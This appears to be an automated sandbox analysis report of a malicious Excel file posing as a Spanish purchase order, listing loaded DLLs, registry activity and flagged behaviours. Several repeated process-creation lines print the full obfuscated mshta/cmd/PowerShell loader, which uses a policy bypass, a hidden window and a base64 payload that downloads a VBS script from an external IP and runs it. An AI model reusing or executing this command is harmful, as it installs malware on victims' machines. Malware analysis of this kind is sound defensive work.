        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
        Source: Orden_de_Compra_Nmero_6782929219.xlsStatic file information: File size 1071616 > 1048576
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.pdb source: powershell.exe, 00000007.00000002.444981624.00000000029D6000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.pdb source: powershell.exe, 00000014.00000002.496191846.0000000002523000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.pdbhP source: powershell.exe, 00000014.00000002.496191846.0000000002523000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.pdbhP source: powershell.exe, 00000007.00000002.444981624.00000000030D9000.00000004.00000800.00020000.00000000.sdmp
        Source: Orden_de_Compra_Nmero_6782929219.xlsInitial sample: OLE indicators encrypted = True

        Data Obfuscation

        barindex
        PowerShell case anomaly found
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"Jump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"
        Suspicious command line found
